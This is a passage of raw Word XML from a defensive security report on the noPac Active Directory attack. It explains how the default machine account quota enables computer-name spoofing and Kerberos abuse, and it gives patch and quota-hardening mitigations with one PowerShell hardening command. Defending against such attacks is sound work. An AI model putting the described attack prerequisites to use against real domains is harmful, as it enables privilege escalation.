          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="660EA8C7" w14:textId="23160028" w:rsidR="006F4908" w:rsidRPr="00BA13B0" w:rsidRDefault="006F4908" w:rsidP="006F4908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0B769F" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0B769F" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Structural Operational Risk – The Machine Account Quota</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E047976" w14:textId="78A68359" w:rsidR="006F4908" w:rsidRPr="00BA13B0" w:rsidRDefault="006F4908" w:rsidP="006F4908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A primary prerequisite for executing the noPac exploit chain lies in the attacker’s ability to create a new computer object in the Active Directory database, ntds.dit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EA46EE" w14:textId="77777777" w:rsidR="006F4908" w:rsidRDefault="006F4908" w:rsidP="006F4908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3464C953" w14:textId="1E747E20" w:rsidR="006F4908" w:rsidRPr="00BA13B0" w:rsidRDefault="006F4908" w:rsidP="00BA13B0">
      <w:p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The Default Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33131322" w14:textId="3CAE490A" w:rsidR="006F4908" w:rsidRPr="00BA13B0" w:rsidRDefault="006F4908" w:rsidP="00BA13B0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">By default, the Active Directory attribute </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ms-DS-MachineAccountQuota</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is set to </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This means that any standard authenticated domain user (including a compromised low-privileged service account or workstation user) has the implicit right to add up to 10 new computer accounts to the domain without any administrative approval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F107BA" w14:textId="22D3C982" w:rsidR="006F4908" w:rsidRPr="00BA13B0" w:rsidRDefault="006F4908" w:rsidP="00BA13B0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Attackers rely on this quota to dynamically spin up new machine accounts from a standard user context, using them as sacrificial containers to execute name-spoofing and Kerberos manipulation attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB8543E" w14:textId="77777777" w:rsidR="006F4908" w:rsidRDefault="006F4908" w:rsidP="006F4908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="662CFCC3" w14:textId="7AEE7986" w:rsidR="006F4908" w:rsidRPr="00BA13B0" w:rsidRDefault="00BA13B0" w:rsidP="00BA13B0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0B769F" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0B769F" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidR="006F4908" w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0B769F" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Defensive Controls and Mitigation Strategy</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0B769F" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="006F4908" w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0B769F" w:themeColor="accent4" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Implement Continuous Configuration Lifecycle Patching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66524887" w14:textId="77777777" w:rsidR="00BA13B0" w:rsidRPr="00BA13B0" w:rsidRDefault="006F4908" w:rsidP="00BA13B0">
      <w:p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Immediate Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA594E4" w14:textId="2C2D70EF" w:rsidR="006F4908" w:rsidRPr="00BA13B0" w:rsidRDefault="006F4908" w:rsidP="00BA13B0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ensure that security updates issued in November 2021 – specifically KB5008383 and KB5008602 – are universally applied to all Domain Controllers in the forest. These</w:t>
      </w:r>
      <w:r w:rsidR="007D6E67" w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> patches introduce strict validation checks on the Kerberos KDC side. The KDC now cross-checks the original requestor identity and rejects TGS requests if the </w:t>
      </w:r>
      <w:r w:rsidR="007D6E67" w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sAMAccountName</w:t>
      </w:r>
      <w:r w:rsidR="007D6E67" w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> has changed or if it attempts to resolve an account without an explicit trailing </w:t>
      </w:r>
      <w:r w:rsidR="007D6E67" w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidR="007D6E67" w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC91C1D" w14:textId="2472EE38" w:rsidR="007D6E67" w:rsidRPr="00BA13B0" w:rsidRDefault="007D6E67" w:rsidP="00BA13B0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Restrict </w:t>
      </w:r>
      <w:r w:rsidR="00BA13B0" w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Computer</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Account Creation Quota</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3701CA3B" w14:textId="77777777" w:rsidR="00BA13B0" w:rsidRPr="00BA13B0" w:rsidRDefault="007D6E67" w:rsidP="00BA13B0">
      <w:p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Hardening Action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D102927" w14:textId="0FF7F86B" w:rsidR="007D6E67" w:rsidRPr="00BA13B0" w:rsidRDefault="007D6E67" w:rsidP="00BA13B0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Modify the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ms-DS-MachineAccountQuota</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> attribute, changing its value from the default of 10 down to 0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE69A32" w14:textId="77777777" w:rsidR="00BA13B0" w:rsidRPr="00BA13B0" w:rsidRDefault="007D6E67" w:rsidP="00BA13B0">
      <w:p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Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B391DF7" w14:textId="2D337FB4" w:rsidR="007D6E67" w:rsidRPr="00BA13B0" w:rsidRDefault="007D6E67" w:rsidP="00BA13B0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Set this attribute to 0</w:t>
      </w:r>
      <w:r w:rsidR="00BA13B0" w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> completely revokes the native permission for non-administrative users to join any machines </w:t>
      </w:r>
      <w:r w:rsidR="00BA13B0" w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the domain. This breaks the automated prerequisites for the noPac exploit chain and prevents attackers from creating unauthorized domain computer objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FE74AF" w14:textId="6D80879C" w:rsidR="0056544D" w:rsidRPr="00BA13B0" w:rsidRDefault="0056544D" w:rsidP="00BA13B0">
      <w:p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Implementation Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195DAD5A" w14:textId="2C488144" w:rsidR="00556DCC" w:rsidRPr="00BA13B0" w:rsidRDefault="0056544D" w:rsidP="00BA13B0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use the ADSI Edit tool or execute the following PowerShell command from an administrative workstation (PAW/SAW) to apply the configuration globally and across the domain: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350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BA13B0" w14:paraId="0C3CA506" w14:textId="77777777" w:rsidTr="00BA13B0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50DC45C4" w14:textId="77777777" w:rsidR="00BA13B0" w:rsidRDefault="00BA13B0" w:rsidP="00BA13B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000088"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="50CDE0F1" w14:textId="053B5944" w:rsidR="00BA13B0" w:rsidRDefault="00BA13B0" w:rsidP="00BA13B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA13B0">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000088"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Set</w:t>
            </w:r>
            <w:r w:rsidRPr="00BA13B0">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>-ADDomain (</w:t>
            </w:r>
            <w:r w:rsidRPr="00BA13B0">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000088"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Get</w:t>
            </w:r>
            <w:r w:rsidRPr="00BA13B0">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>-ADDomain).DistinguishedName -</w:t>
            </w:r>
            <w:r w:rsidRPr="00BA13B0">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000088"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Replace</w:t>
            </w:r>
            <w:r w:rsidRPr="00BA13B0">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> @{"ms-DS-MachineAccountQuota"=0}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B1192E2" w14:textId="6011DF2B" w:rsidR="00BA13B0" w:rsidRDefault="00BA13B0" w:rsidP="00BA13B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B65A29D" w14:textId="77777777" w:rsidR="00BA13B0" w:rsidRDefault="00BA13B0" w:rsidP="00BA13B0">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69FFB321" w14:textId="0ED45FCE" w:rsidR="0056544D" w:rsidRPr="00BA13B0" w:rsidRDefault="0056544D" w:rsidP="00BA13B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA13B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Summary of CVE Architecture Metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048C77ED" w14:textId="77777777" w:rsidR="0056544D" w:rsidRDefault="0056544D" w:rsidP="0056544D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="720" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2940"/>
        <w:gridCol w:w="2845"/>
        <w:gridCol w:w="2845"/>
      </w:tblGrid>
      <w:tr w:rsidR="0056544D" w14:paraId="4E29FDB2" w14:textId="77777777" w:rsidTr="0056544D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2940" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66FC4E4D" w14:textId="6AB9B4B0" w:rsidR="0056544D" w:rsidRDefault="0056544D" w:rsidP="0056544D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Evaluation Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2845" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7854D0D0" w14:textId="7DE153DE" w:rsidR="0056544D" w:rsidRDefault="0056544D" w:rsidP="0056544D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Vulnerable State</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2845" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68DBAA87" w14:textId="767362FC" w:rsidR="0056544D" w:rsidRDefault="0056544D" w:rsidP="0056544D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Remediated Target State</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0056544D" w14:paraId="3A504D57" w14:textId="77777777" w:rsidTr="0056544D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2940" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F644453" w14:textId="3ADFA96A"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KDC Account Lookup Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2845" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="649DE809" w14:textId="147A9F49"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 xml:space="preserve">Appends </w:t>
            </w:r>
            <w:r w:rsidRPr="0056544D">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="002060"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r w:rsidRPr="0056544D">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="002060"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> dynamically to failed lookups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2845" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18DB90D7" w14:textId="04929765"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Rejects ticket requests if account name mapping is inconsistent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0056544D" w14:paraId="36F3045D" w14:textId="77777777" w:rsidTr="0056544D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2940" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25D31806" w14:textId="44B51695"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lastRenderedPageBreak/>
              <w:t>Machine Name Formatting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2845" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E4D5C39" w14:textId="542370D0"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 xml:space="preserve">Allows machine accounts without a trailing </w:t>
            </w:r>
            <w:r w:rsidRPr="0056544D">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="002060"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2845" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68D7B977" w14:textId="38F40EE6"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Enforces strict naming conventions on computer objects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0056544D" w14:paraId="52C6C3B2" w14:textId="77777777" w:rsidTr="0056544D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2940" w:type="dxa"/>
          </w:tcPr>
